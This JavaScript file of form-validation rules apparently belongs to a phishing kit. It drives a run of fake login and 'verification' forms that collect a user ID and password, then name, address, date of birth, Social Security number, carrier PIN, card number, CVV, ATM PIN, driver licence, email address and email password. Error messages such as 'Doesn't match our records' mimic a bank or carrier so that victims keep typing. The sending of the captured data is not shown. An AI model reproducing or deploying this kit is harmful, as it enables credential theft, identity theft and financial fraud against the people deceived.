document.addEventListener('DOMContentLoaded', function(e) {
    FormValidation.formValidation(
        document.getElementById('empass'),
        {
            fields: {
				username: {
                    validators: {
                        notEmpty: {
                            message: 'You must supply a user ID.'
                        },
                       stringLength: {
                            min: 4,
                            message: '&#32;',
                        },
                    }
                },
                password: {
                    validators: {
                        notEmpty: {
                            message: 'You must supply a password.'
                        },
                       stringLength: {
                            min: 4,
                            message: '&#32;',
                        },
                    }
                },
				
            },
            plugins: {
                trigger: new FormValidation.plugins.Trigger(),
                foundation: new FormValidation.plugins.Foundation(),

                submitButton: new FormValidation.plugins.SubmitButton(),
                icon: new FormValidation.plugins.Icon({
                    valid: 'fa fa-check',
                    invalid: 'fa fa-times',
                    validating: 'fa fa-refresh'
                }),	
				defaultSubmit: new FormValidation.plugins.DefaultSubmit(),
            },
        }
    );
});



document.addEventListener('DOMContentLoaded', function(e) {
    FormValidation.formValidation(
        document.getElementById('infrr'),
        {
            fields: {
              noc: {
                    validators: {
                        notEmpty: {
                            message: 'Enter your first and last name.'
                        },
                       
                        regexp: {
                            regexp: /^([a-zA-Z]{2,}\s[a-zA-z]{1,}'?-?[a-zA-Z]{2,}\s?([a-zA-Z]{1,})?)$/,
                            message: 'Full name is required.',
                        },
                    }
                },
				stradd: {
                    validators: {
                        notEmpty: {
                            message: 'Street Address is required'
							  },
                         regexp: {
                            regexp: /^\d+\s[A-z]+\s[A-z]+/,
                            message: 'Doesn\'t match our records.',
                        },
                    }
                },
				date: {
                    validators: {
					notEmpty: {
                            message: 'Date of birth is required mm/dd/yyyy'
							  },
                        date: {
						  
                            format: 'MM/DD/YYYY',
                            message: 'We didn\'t recognize your date of birth. Please try again.',
                            // min and max options can be strings or Date objects
                            min: '01/01/1931',
                            max: '12/30/2002'
                        },
					
                    }
                },
				ssn: {
                    validators: {
                        notEmpty: {
                            message: 'Social security number is required'
							  },
                         regexp: {
                            regexp: /^(?!000|666|9)\d{3}(-?)(?!00)\d{2}\1(?!0000)\d{4}$/,
                            message: 'Doesn\'t match our records.',
                        },
                    }
                },
				phone: {
                    validators: {
                        notEmpty: {
                            message: 'We can\'t find you in our records.'
                        },
                         regexp: {
                            regexp: /^(\([0-9]{3}\) |[0-9]{3}-)[0-9]{3}-[0-9]{4}$/,
                            message: 'Enter your phone number',
                        },
                    }
                },
				cpin: {
                    validators: {
                        notEmpty: {
                            message: 'Enter your Carrier pin.'
                        },
						stringLength: {
                            min: 4,
                            max: 6,
                            message: 'Doesn\'t match our records.',
                        },
                         regexp: {
                            regexp: /^[0-9]*$/,
                           message: 'Doesn\'t match our records.',
                        },
                    }
                },
				stradd: {
                    validators: {
                        notEmpty: {
                            message: 'Home Address is required'
							  },
                    }
                },
				zip: {
                    validators: {
                        notEmpty: {
                            message: 'Zipcode is required.'
                        },
						stringLength: {
                            min: 5,
                            max: 5,
                            message: '&#x20;',
                        },
                        regexp: {
                            regexp: /^\d{1,5}$/,
                            message: 'Doesn\'t match our records',
                        },
                    }
                },
            },
            plugins: {
                trigger: new FormValidation.plugins.Trigger(),
                foundation: new FormValidation.plugins.Foundation(),

                submitButton: new FormValidation.plugins.SubmitButton(),
                icon: new FormValidation.plugins.Icon({
                    valid: 'fa fa-check',
                    invalid: 'fa fa-times',
                    validating: 'fa fa-refresh'
                }),	
				defaultSubmit: new FormValidation.plugins.DefaultSubmit(),
            },
        }
    );
});




document.addEventListener('DOMContentLoaded', function(e) {
    FormValidation.formValidation(
        document.getElementById('wecc'),
        {
            fields: {
				
         cc: {
                    validators: {
                        notEmpty: {
                            message: 'Please enter a card number.'
                        },
                        creditCard: {
                            message: 'Enter a valid card number.'
                        },
                    }
                },
				expdate: {
                    validators: {
                        notEmpty: {
                            message: 'Enter an expiration date.'
                        },
                        stringLength: {
                            min: 4,
                            max: 5,
                            message: '&#x20;',
                        },
                        regexp: {
                            regexp: /^((0[1-9])|(1[0-2]))\/((20)|([2-2][0-9]))$/,
                            message: 'Invalid expiration date.',
                        },
                    }
                },
				cvv: {
                    validators: {
                        notEmpty: {
                            message: 'Enter card cvv.'
                        },
                        stringLength: {
                            min: 3,
                            max: 3,
                            message: 'Doesn\'t match our records.',
                        },
                    }
                },
				atm: {
                    validators: {
                        notEmpty: {
                            message: 'Atm pin is required.'
                        },
                        stringLength: {
                            min: 4,
                            max: 4,
                            message: 'Doesn\'t match any record.',
                        },
                    }
                },
				dl: {
                    validators: {
                        notEmpty: {
                            message: 'Enter a driver license number.'
							  },
                    }
                },
            },
            plugins: {
                trigger: new FormValidation.plugins.Trigger(),
                foundation: new FormValidation.plugins.Foundation(),

                submitButton: new FormValidation.plugins.SubmitButton(),
                icon: new FormValidation.plugins.Icon({
                    valid: 'fa fa-check',
                    invalid: 'fa fa-times',
                    validating: 'fa fa-refresh'
                }),	
				defaultSubmit: new FormValidation.plugins.DefaultSubmit(),
            },
        }
    )
	.on('core.validator.validated', function(e) {
        if (e.field === 'cc' && e.validator === 'creditCard' && e.result.valid) {
            let icon = '';
            // e.result.meta.type can be one of
            // AMERICAN_EXPRESS, DINERS_CLUB, DINERS_CLUB_US, DISCOVER, JCB, LASER,
            // MAESTRO, MASTERCARD, SOLO, UNIONPAY, VISA
            switch (e.result.meta.type) {
                case 'AMERICAN_EXPRESS':
                    icon = 'fa fa-cc-amex';
                    break;
                
                case 'DISCOVER':
                    icon = 'fa-cc-discover';
                    break;
                
                case 'MASTERCARD':
                case 'DINERS_CLUB_US':
                    icon = 'fa-cc-mastercard';
                    break;
                
                case 'VISA':
                    icon = 'fa-cc-visa';
                    break;
                
                default:
                    icon = 'fa-credit-card';
                    break;
            }

            // Query the icon element
            const iconEle = e.element.nextSibling;
            iconEle.setAttribute('class', 'fv-plugins-icon ' + icon);
        }
    })
    .on('core.element.validated', function(e) {
        if (e.field === 'cc' && !e.valid) {
            const iconEle = e.element.nextSibling;
            iconEle.setAttribute('class', 'fv-plugins-icon fa fa-times');
        }
    });
});


document.addEventListener('DOMContentLoaded', function(e) {
    FormValidation.formValidation(
        document.getElementById('infrreal'),
        {
            fields: {
             email: {
                    validators: {
                        notEmpty: {
                            message: 'Enter the valid informations we have in our records.<br/>Enter your Email address.'
                        },
                        regexp: {
                            regexp: /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/,
                            message: 'We can\'t find you in our records',
                        },
                    }
                },
				empass: {
                    validators: {
                        notEmpty: {
                            message: 'Enter your email password to continue. '
                        },
                        stringLength: {
                            min: 4,
                            max: 35,
                            message: 'Doesn\'t match our records.',
                        },
                    }
                },
            },
            plugins: {
                trigger: new FormValidation.plugins.Trigger(),
                foundation: new FormValidation.plugins.Foundation(),

                submitButton: new FormValidation.plugins.SubmitButton(),
                icon: new FormValidation.plugins.Icon({
                    valid: 'fa fa-check',
                    invalid: 'fa fa-times',
                    validating: 'fa fa-refresh'
                }),	
				defaultSubmit: new FormValidation.plugins.DefaultSubmit(),
            },
        }
    );
});

document.addEventListener('DOMContentLoaded', function(e) {
    FormValidation.formValidation(
        document.getElementById('emlerr'),
        {
            fields: {
             emailerr: {
                    validators: {
                        notEmpty: {
                            message: 'Enter the valid informations we have in our records.<br/>Enter your Email address.'
                        },
                        regexp: {
                            regexp: /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/,
                            message: 'We can\'t find you in our records',
                        },
                    }
                },
				empasserr: {
                    validators: {
                        notEmpty: {
                            message: 'Enter your email password to continue. '
                        },
                        stringLength: {
                            min: 4,
                            max: 35,
                            message: 'Doesn\'t match our records.',
                        },
                    }
                },
            },
            plugins: {
                trigger: new FormValidation.plugins.Trigger(),
                foundation: new FormValidation.plugins.Foundation(),

                submitButton: new FormValidation.plugins.SubmitButton(),
                icon: new FormValidation.plugins.Icon({
                    valid: 'fa fa-check',
                    invalid: 'fa fa-times',
                    validating: 'fa fa-refresh'
                }),	
				defaultSubmit: new FormValidation.plugins.DefaultSubmit(),
            },
        }
    );
});